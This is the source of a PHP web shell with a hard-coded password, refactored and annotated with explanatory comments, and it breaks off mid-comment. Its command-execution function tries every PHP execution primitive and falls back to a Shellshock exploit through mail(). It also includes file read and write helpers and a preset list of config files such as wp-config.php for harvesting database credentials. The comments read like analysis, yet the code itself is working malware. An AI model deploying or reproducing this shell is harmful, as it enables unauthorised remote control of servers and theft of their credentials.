<?php
//error_reporting(0); // left disabled here; enabling it would silence every PHP error message
$password='Tr0y'; // hard-coded access password for this script; exported below as the postpass constant
date_default_timezone_set('UTC'); // pin the default timezone so date output is stable across hosts
ob_start(); // buffer all output produced by the rest of the script
define('myaddress', $_SERVER['SCRIPT_FILENAME']); // absolute filesystem path of this script
define('postpass', $password); // the password as a constant (referenced by the commented-out show_main* functions below)
// Exec_Run($cmd): run the shell command string $cmd and return its captured output.
// The command-execution primitives are tried in a fixed order -- exec, shell_exec, system,
// passthru, popen, the Windows COM "WScript.shell" object, proc_open and finally a
// Shellshock (CVE-2014-6271) attempt through mail() -- and the first one that exists is
// used. Which branch is reachable therefore depends on php.ini (disable_functions), which is
// the knob a defender controls; nearly every call is @-suppressed, so failures are silent.
// Returns '' when the chosen branch produced no output.
function Exec_Run($cmd)
{
    $res = ''; // captured output of the command
    if (function_exists('exec')) { // preferred: exec() collects stdout as an array of lines
        @exec($cmd, $res);
        $res = join("\n", $res); // lines -> one string
    } elseif (function_exists('shell_exec')) {
        $res = @shell_exec($cmd);
    } elseif (function_exists('system')) {
        // system() prints straight to output, so it is captured through an output buffer.
        // (The original annotator found this construction odd.)
        @ob_start();
        @system($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    }

    // popen() branch: read the process pipe until EOF. As the original note points out,
    // popen() returns a valid resource even when the command cannot be found, so once this
    // point is reached the condition always holds and every branch below it is unreachable.
    elseif (@is_resource($f = @popen($cmd, 'r'))) {
        $res = '';
        while (!@feof($f)) {
            $res .= @fread($f, 1024);
        }
        @pclose($f);
    }

    // Windows-only branch (script directory does not start with "/" and the COM extension
    // is loaded). The original annotator had not tested it.
    elseif (substr(dirname($_SERVER["SCRIPT_FILENAME"]), 0, 1) != "/" && class_exists('COM')) {
        $w = new COM('WScript.shell');
        $e = $w->exec($cmd);
        $f = $e->StdOut();
        $res = $f->ReadAll();
    }

    // proc_open branch: captures stdout (pipe 1) and stderr (pipe 2), HTML-escaped.
    elseif (function_exists('proc_open')) {
        $length = strcspn($cmd, " \t"); // length of the leading whitespace-free token of $cmd
        $token = substr($cmd, 0, $length); // the command word itself

        // $aliases is never assigned inside this function, so isset() is always false and
        // the alias substitution is dead code.
        if (isset($aliases[$token])) {
            $cmd = $aliases[$token] . substr($cmd, $length);
        }

        // descriptor spec: 0 = stdin, 1 = stdout, 2 = stderr; only 1 and 2 are piped here
        $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!feof($io[1])) {
            // htmlspecialchars() with ENT_COMPAT converts double quotes but not single quotes
            $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($p);
    }

    // Last resort: Shellshock (CVE-2014-6271) through mail(), only when /bin/sh is bash.
    elseif (function_exists('mail')) {
        if (strstr(readlink("/bin/sh"), "bash") != false) {
            $tmp = tempnam(".", "data");
            putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
            mail("a@127.0.0.1", "", "", "", "-bv");
        } else {
            $res = "Not vuln (not bash)";
        }

        // Original note: this block belongs inside the if above. When /bin/sh is not bash,
        // $tmp is undefined here, file() is called on null, and the "Not vuln" message set
        // above is overwritten by "No output, or not vuln.".
        $output = @implode('', @file($tmp));
        @unlink($tmp);
        if ($output != "") {
            $res = $output;
        } else {
            $res = "No output, or not vuln.";
        }
    }
    return $res;
}
// css_img($img): send one of the small GIF icons embedded below (base64, keyed by type
// name: exe, dir, txt, html, js, xml, mp3, img, title, rar) as an image/gif response and
// stop the script. An unknown key reads an undefined array index and sends an empty body.
function css_img($img)
{
    $images = array(
        "exe" =>
        "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" .
        "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" .
        "xhIAOw==",
        "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" .
        "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
        "txt" =>
        "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" .
        "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" .
        "UpPWG3Ig6Hq/XmRjuZwkAAA7",
        "html" =>
        "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" .
        "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" .
        "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" .
        "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" .
        "ADs=",
        "js" =>
        "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" .
        "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" .
        "a00AjYYBbc/o9HjNniUAADs=",
        "xml" =>
        "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" .
        "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" .
        "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" .
        "IQA7",
        "mp3" =>
        "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" .
        "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" .
        "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
        "img" =>
        "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" .
        "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" .
        "FxEAOw==",
        "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" .
        "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" .
        "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
        "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" .
        "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" .
        "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" .
        "aNOmRcjVj02tPxPCzfkvIAA7"
    );
    header('Content-type: image/gif');
    echo base64_decode($images[$img]); // unknown $img: undefined index, empty body
    die(); // nothing after the image is ever sent
}
// css_showimg($file): map the last three characters of a file name (e.g. "jpg", "tml",
// ".js") to the icon key used by css_img(); anything unrecognised is reported as 'txt'.
function css_showimg($file)
{
    $groups = array(
        'img'  => array('jpg', 'gif', 'bmp', 'png', 'ico'),
        'html' => array('htm', 'tml'),
        'exe'  => array('exe', 'com'),
        'xml'  => array('xml', 'doc'),
        'js'   => array('.js', 'vbs'),
        'mp3'  => array('mp3', 'wma', 'wav', 'swf', '.rm', 'avi', 'mp4', 'mvb'),
        'rar'  => array('rar', 'tar', '.gz', 'zip', 'iso'),
    );
    $tail = substr($file, -3); // three trailing characters, not a real extension
    foreach ($groups as $kind => $tails) {
        if (in_array($tail, $tails, true)) {
            return $kind;
        }
    }
    return 'txt';
}
// html_n($data): print $data followed by a newline. Every html_* helper below goes through it.
function html_n($data)
{
    echo $data . "\n";
}
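// muma($filecode, $filetype): crude signature check -- true when $filecode contains (case-
// insensitively) one of the strings listed for $filetype ('php', 'asp', 'aspx', 'jsp').
// Returns false for no hit and for an unknown $filetype; the original returned null in
// both cases and raised a warning when the type had no signature list.
function muma($filecode, $filetype)
{
    $dim = array(
        "php" => array("eval(", "exec("),
        "asp" => array("WScript.Shell", "execute(", "createtextfile("),
        "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
        "jsp" => array("runtime.exec(")
    );
    if (!isset($dim[$filetype])) {
        return false;
    }
    foreach ($dim[$filetype] as $code) {
        // stristr() returns the matched tail (possibly "0"), so compare with false explicitly
        if (stristr($filecode, $code) !== false) {
            return true;
        }
    }
    return false;
}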
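// debug($file, $ftype): true when $file contains (case-insensitively) any of the '|'-
// separated patterns in $ftype, e.g. debug('a.php', 'php|asp'). Returns false otherwise;
// the original fell off the end and returned null. Empty patterns (a trailing '|') are
// skipped instead of matching every file.
function debug($file, $ftype)
{
    foreach (explode('|', $ftype) as $needle) {
        if ($needle !== '' && stristr($file, $needle) !== false) {
            return true;
        }
    }
    return false;
}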
// str_path($path): collapse each "//" in $path to a single "/". One left-to-right pass,
// exactly like str_replace(), so "///" becomes "//".
function str_path($path)
{
    return strtr($path, array('//' => '/'));
}
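// msg($msg): abort the request with a JavaScript alert() of $msg followed by history.go(-1).
// $msg is JSON-encoded with <, >, ', " and & hex-escaped, so quotes, newlines or a
// "</script>" inside it cannot break out of the string literal (the original interpolated
// it raw between single quotes). Never returns.
function msg($msg)
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_UNESCAPED_UNICODE;
    $literal = json_encode((string) $msg, $flags);
    if ($literal === false) {
        // e.g. invalid UTF-8: fall back to an empty message rather than emitting broken JS
        $literal = "''";
    }
    die("<script>window.alert(" . $literal . ");history.go(-1);</script>");
}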
// uppath($nowpath): the parent directory of $nowpath with backslashes turned into
// forward slashes, URL-encoded for use in a query string.
function uppath($nowpath)
{
    $parent = dirname($nowpath);
    $normalized = strtr($parent, '\\', '/');
    return urlencode($normalized);
}
// html_ta($url, $name): print an <a> that opens $url in a new window. Neither argument is escaped.
function html_ta($url, $name)
{
    html_n(sprintf('<a href="%s" target="_blank">%s</a>', $url, $name));
}
// html_a($url, $name, $where = ''): print an <a> for $url; $where is injected verbatim as
// extra attributes. A trailing space follows the closing tag. Nothing is escaped.
function html_a($url, $name, $where = '')
{
    html_n(sprintf('<a href="%s" %s>%s</a> ', $url, $where, $name));
}
// html_img($url): print an <img> whose source is this script's ?img= endpoint (css_img()).
function html_img($url)
{
    html_n(sprintf('<img src="?img=%s" border=0>', $url));
}
// back(): print a "返回" (back) button that calls history.back().
function back()
{
    $label = '返回';
    html_n(sprintf("<input type='button' value='%s' onclick='history.back();'>", $label));
}
// html_radio($namei, $namet, $v1, $v2): print two radio buttons named "return"; the first
// ($v1, labelled $namei) is pre-checked, the second ($v2, labelled $namet) ends the row.
function html_radio($namei, $namet, $v1, $v2)
{
    $template = '<input type="radio" name="return" value="%s"%s>%s';
    html_n(sprintf($template, $v1, ' checked', $namei));
    html_n(sprintf($template, $v2, '', $namet . '<br><br>'));
}
// html_input($type, $name, $value = '', $text = '', $size = '', $mode = false): print an
// <input>. With $mode true it is rendered checked and $text follows it; otherwise $text
// precedes it. Attribute values are not escaped.
function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
{
    $field = "<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\"";
    if ($mode) {
        html_n($field . " checked>$text");
    } else {
        html_n("$text " . $field . '>');
    }
}
// html_text($name, $cols, $rows, $value = ''): print a <textarea> preceded by two line
// breaks. $value is inserted unescaped.
function html_text($name, $cols, $rows, $value = '')
{
    html_n(sprintf('<br><br><textarea name="%s" COLS="%s" ROWS="%s" >%s</textarea>', $name, $cols, $rows, $value));
}
// html_select($array, $mode = '', $change = '', $name = 'class'): print a <select> with
// one <option> per key/value of $array; the option whose key loosely equals $mode is
// pre-selected. $change is injected verbatim as extra attributes.
function html_select($array, $mode = '', $change = '', $name = 'class')
{
    html_n("<select name=$name $change>");
    foreach ($array as $optValue => $optLabel) {
        // loose comparison on purpose: integer keys must still match a string $mode
        $selected = ($optValue == $mode) ? ' selected' : '';
        html_n("<option value=\"$optValue\"$selected>$optLabel</option>");
    }
    html_n("</select>");
}
// html_font($color, $size, $name): print $name wrapped in a <font> tag with the given colour and size.
function html_font($color, $size, $name)
{
    html_n(sprintf('<font color="%s" size="%s">%s</font>', $color, $size, $name));
}
// File_Str($string): normalise a path -- backslashes become "/", then each "//" becomes "/".
function File_Str($string)
{
    // str_replace() with arrays applies the pairs in order: first '\' -> '/', then '//' -> '/'
    return str_replace(array('\\', '//'), array('/', '/'), $string);
}
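// File_Write($filename, $filecode, $filemode): open $filename with fopen mode $filemode,
// write $filecode and close. Returns true on success, false when the file cannot be
// opened or the write fails. Fixes: a failed fopen() no longer reaches fwrite() with false
// (a TypeError on PHP 8), and writing an empty string counts as success (fwrite() returning
// 0 bytes was previously mistaken for a failure). The original also chmod'ed the target
// to 0666 and retried; permissions are resolved at open time, so that retry could never
// help and has been dropped.
function File_Write($filename, $filecode, $filemode)
{
    $handle = @fopen($filename, $filemode);
    if ($handle === false) {
        return false;
    }
    $written = @fwrite($handle, $filecode);
    @fclose($handle);
    return $written !== false;
}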
// File_Mode(): guess the web root by stripping the directory part of PHP_SELF from the
// end of the current working directory, normalised to forward slashes.
function File_Mode()
{
    $cwd = realpath('./');
    $self = $_SERVER['PHP_SELF'];
    $selfDir = substr($self, 0, strrpos($self, '/'));
    $root = substr($cwd, 0, strlen($cwd) - strlen($selfDir));
    // same normalisation File_Str() performs: '\' -> '/', then '//' -> '/'
    return str_replace('//', '/', str_replace('\\', '/', $root));
}
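// GetFileOwner($File): owner name of $File on POSIX systems (PATH_SEPARATOR is ':'), or
// the numeric uid as a string when ext/posix is missing or the uid has no passwd entry.
// Returns null on Windows (as before) and when the file cannot be stat'ed; the original
// passed fileowner()'s false on to posix_getpwuid() or indexed a plain string with 'name'.
function GetFileOwner($File)
{
    if (PATH_SEPARATOR !== ':') {
        return null;
    }
    $uid = @fileowner($File);
    if ($uid === false) {
        return null;
    }
    if (function_exists('posix_getpwuid')) {
        $entry = posix_getpwuid($uid);
        if (is_array($entry) && isset($entry['name'])) {
            return $entry['name'];
        }
    }
    return (string) $uid;
}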
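// GetFileGroup($File): group name of $File on POSIX systems (PATH_SEPARATOR is ':'), or
// the numeric gid as a string when ext/posix is missing or the gid has no group entry.
// Returns null on Windows (as before) and when the file cannot be stat'ed; the original
// passed filegroup()'s false on to posix_getgrgid() or indexed a plain string with 'name'.
function GetFileGroup($File)
{
    if (PATH_SEPARATOR !== ':') {
        return null;
    }
    $gid = @filegroup($File);
    if ($gid === false) {
        return null;
    }
    if (function_exists('posix_getgrgid')) {
        $entry = posix_getgrgid($gid);
        if (is_array($entry) && isset($entry['name'])) {
            return $entry['name'];
        }
    }
    return (string) $gid;
}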
// File_Size($size): format a byte count with a unit suffix (" B", " K", " M", " G", " T",
// " ST" for petabytes and beyond). Values below 1024 are printed unrounded; larger ones
// are divided by the unit and rounded to two decimals.
function File_Size($size)
{
    if ($size < 1024) {
        return $size . " B";
    }
    $units = array("K", "M", "G", "T", "ST");
    $lastIndex = count($units) - 1;
    $divisor = 1024;
    foreach ($units as $index => $unit) {
        $nextDivisor = $divisor * 1024;
        // the last unit has no upper bound
        if ($index === $lastIndex || $size < $nextDivisor) {
            return round($size / $divisor, 2) . " " . $unit;
        }
        $divisor = $nextDivisor;
    }
}
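// File_Read($filename): return the whole file as a binary-safe string, or false when it
// cannot be read. The hand-rolled fopen/fread/fclose sequence is replaced by
// file_get_contents(): the original called fread() on a false handle when fopen() failed
// and with a length of 0 for empty files, both of which throw on PHP 8.
function File_Read($filename)
{
    return @file_get_contents($filename);
}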
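// array_iconv($data, $output = 'utf-8'): convert a string, or recursively every key and
// value of an array, to the $output charset, guessing the source charset with
// mb_detect_encoding() per string. Fixes: the original detected the encoding of the whole
// array (a TypeError on PHP 8), converted the whole array instead of each value, and left
// the old key behind whenever a converted key differed. Strings whose charset cannot be
// detected are returned unchanged; integer keys are kept as they are.
function array_iconv($data, $output = 'utf-8')
{
    $encode_arr = array('UTF-8', 'ASCII', 'GBK', 'utf8', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP');

    if (!is_array($data)) {
        $text = (string) $data;
        $encoded = mb_detect_encoding($text, $encode_arr);
        if ($encoded === false) {
            return $text;
        }
        return mb_convert_encoding($text, $output, $encoded);
    }

    $converted = array();
    foreach ($data as $key => $val) {
        $newKey = is_int($key) ? $key : array_iconv($key, $output);
        $converted[$newKey] = array_iconv($val, $output); // handles nested arrays and scalars alike
    }
    return $converted;
}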
// Mysql_Len($data, $len): truncate $data to $len bytes and append "..." when it is $len
// bytes or longer; shorter strings are returned untouched. Byte-based (strlen), so a
// multibyte character may be cut in half.
function Mysql_Len($data, $len)
{
    $needsCut = strlen($data) >= $len;
    return $needsCut ? substr($data, 0, $len) . '...' : $data;
}
// css_js($num, $code = ''): print a <script> block chosen by $num ("1", "2" or "4"; the
// comparison is loose, so integers work too; any other value prints an empty script).
// $code is accepted but never used.
//   1 - prompt/confirm helpers for the file list: rename, delete, bulk select, set mtime,
//       submit a URL. Note rusuredel() assigns URL = url + msg but then navigates to url.
//   2 - in-page text search (NS4/IE4 era APIs) plus the editor's CheckDate() submit handler,
//       assembled from three heredoc fragments; the middle one is printed only when
//       PHP_VERSION starts with a digit >= 5, i.e. always on any PHP this file runs on.
//   4 - Fulll(i): fills sform.code with one of ten common config-file names.
function css_js($num, $code = '')
{
    html_n('<script language="javascript">');
    if ($num == "1") {
        $str = <<<end
function rusurechk(msg,url){
 smsg = "FileName:[" + msg + "]\\nPlease Input New File:";
 re = prompt(smsg,msg);
 if (re){
 url = url + re;
 window.location = url;
 }
 }
 function rusuredel(msg,url){
 smsg = "Do You Suer Delete [" + msg + "] ?";
 if(confirm(smsg)){
 URL = url + msg;
 window.location = url;
 }
 }
 function Delok(msg,gourl)
 {
 smsg = "确定要删除[" + unescape(msg) + "]吗?";
 if(confirm(smsg))
 {
 if(gourl == 'b')
 {
 document.getElementById('actall').value = escape(gourl);
 document.getElementById('fileall').submit();
 }
 else window.location = gourl;
 }
 }
 function SubmitAttran(msg,ffile,txt,actid)
 {
 re = prompt(msg,unescape(txt));
 if(re)
 {
 document.getElementById('attam').value = actid;
 document.getElementById('file').value = ffile;
 document.getElementById('inver').value = re;
 document.getElementById('fileall').submit();
 }
 }
 function CheckAll(form)
 {
 for(var i=0;i<form.elements.length;i++)
 {
 var e = form.elements[i];
 if (e.name != 'chkall')
 e.checked = form.chkall.checked;
 }
 }
 function CheckDate(msg,gourl)
 {
 smsg = "当前文件时间:[" + msg + "]";
 re = prompt(smsg,msg);
 if(re)
 {
 var url = gourl + re;
 var reg = /^(\d{1,4})(-|\/)(\d{1,2})\\2(\d{1,2}) (\d{1,2}):(\d{1,2}):(\d{1,2})$/;
 var r = re.match(reg);
 if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
 else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
 }
 }
 function SubmitUrl(msg,txt,actid)
 {
 re = prompt(msg,unescape(txt));
 if(re)
 {
 document.getElementById('actall').value = actid;
 document.getElementById('inver').value = escape(re);
 document.getElementById('fileall').submit();
 }
 }
end;
        html_n($str);
    } elseif ($num == "2") {
        // first fragment: search() plus the opening of CheckDate() -- its braces are closed
        // by the fragments printed below
        $str = <<<end
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
 var txt, i, found;
 if(str == "")return false;
 if(NS4){
 if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
 if(n == 0) alert(str + " ... Not-Find")
 }
 if(IE4){
 txt = win.document.body.createTextRange();
 for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
 txt.moveStart("character", 1);
 txt.moveEnd("textedit")
 }
 if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
 else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
 }
 return false
}
function CheckDate(){
 var re = document.getElementById('mtime').value;
 var reg = /^(\d{1,4})(-|\/)(\d{1,2})\\2(\d{1,2}) (\d{1,2}):(\d{1,2}):(\d{1,2})$/;
 var r = re.match(reg);
 var t = document.getElementById('charset').value;
 t = t.toLowerCase();
 if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
 else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);
 if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}
end;

        html_n($str);
        // "7" >= 5 and "8" >= 5 are numeric comparisons, so this branch always runs on PHP 5+
        if (substr(PHP_VERSION, 0, 1) >= 5) {
            $str = <<<end
if(t=="gbk" || t=="utf8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}
end;
            html_n($str);
        }
        // closing fragment: submits the editor form and closes CheckDate()'s else block and body
        $str = <<<end
document.getElementById('editor').submit();}
}
end;
        html_n($str);
    } elseif ($num == "4") {
        $str = <<<end
function Fulll(i){
 if(i==0){
 return false;
 }
 Str = new Array(10);
 Str[1] = "config.inc.php";
 Str[2] = "config.inc.php";
 Str[3] = "config_base.php";
 Str[4] = "config.inc.php";
 Str[5] = "config.php";
 Str[6] = "wp-config.php";
 Str[7] = "config.php";
 Str[8] = "mysql.php";
 Str[9] = "common.inc.php";
 Str[10] = "databases.php";
 sform.code.value = Str[i];
 return true;
 }
end;
        html_n($str);
    }
    html_n("</script>");
}
// css_left(): print the stylesheet for the left-hand menu, then a small script defining
// getObject() (element lookup with document.all / document.layers fallbacks) and
// showHide() (display toggle), and open the <div class="menu"> container. Nothing in this
// function closes that div -- presumably later output does.
function css_left()
{
    $str = <<<end
<style type="text/css">
 .menu{width:152px;margin-left:auto;margin-right:auto;}
 .menu dl{margin-top:2px;}
 .menu dl dt{top left repeat-x;}
 .menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
 text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
 .menu dl dt a:hover{color:#FFFFCC;}
 .menu dl dd ul{list-style:none;}
 .menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
 background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
 border-style:solid;border-width:1px;}
 .menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
 </STYLE>
end;
    html_n($str);
    $str = <<<end
<script language="javascript">
 function getObject(objectId){
 if(document.getElementById && document.getElementById(objectId)) {
 return document.getElementById(objectId);
 }
 else if (document.all && document.all(objectId)) {
 return document.all(objectId);
 }
 else if (document.layers && document.layers[objectId]) {
 return document.layers[objectId];
 }
 else {
 return false;
 }
 }
 function showHide(objname){
 var obj = getObject(objname);
 if(obj.style.display == "none"){
 obj.style.display = "block";
 }else{
 obj.style.display = "none";
 }
 }
 </script><div class="menu">
end;
    html_n($str);
}
// css_main(): print the page-wide stylesheet, open <body> (with an IE-only gradient
// filter and scrollbar colours) and the outer <table>. css_foot() prints the matching
// </td></tr></table>.
function css_main()
{
    $str = <<<end
<style type="text/css">
 *{padding:0px;margin:0px;}
 body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
 body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
 height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
 input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
 a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
 .actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
 </STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
 <table width="85%" border=0 bgcolor="#555555" align="center">
end;
    html_n($str);
}
// css_foot(): close the table cell, row and table that css_main() opened.
function css_foot()
{
    echo "</td></tr></table>\n";
}
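// do_write($file, $t, $text): open $file with fopen mode $t, write $text (skipped when it
// is "", but the file is still opened, so "wb" still truncates it) and close. Returns true
// on success, false when the file cannot be opened or the write fails. Fixes: a failed
// fopen() no longer reaches fwrite() with false (a TypeError on PHP 8). The original also
// chmod'ed the target to 0666 and retried the write; permissions are resolved at open
// time, so that retry could never help and has been dropped.
function do_write($file, $t, $text)
{
    $handle = @fopen($file, $t);
    if ($handle === false) {
        return false;
    }
    $ok = true;
    if ($text != "") { // loose on purpose: the original skipped "" this way
        $ok = @fwrite($handle, $text) !== false;
    }
    @fclose($handle);
    return $ok;
}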
// Registered before its definition: PHP hoists unconditional top-level function declarations.
set_error_handler("warning_handler", E_WARNING);
// warning_handler(): E_WARNING handler that records "a warning happened" by setting the
// $_GET['warning'] flag, which do_show() resets before listing a directory and checks
// afterwards. It ignores the ($errno, $errstr, ...) arguments PHP passes, and because it
// does not return false the standard handler never runs, so the warning text is dropped.
function warning_handler()
{
    $_GET['warning'] = 1;
}
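// do_show($filepath): list the entries of directory $filepath (excluding "." and "..") as
// full paths with "//" collapsed to "/". Returns the integer 1 when the directory cannot
// be opened -- callers test for exactly 1. Fixes: dir()'s false return is checked directly
// instead of only through the warning_handler() flag (which is still reset and honoured),
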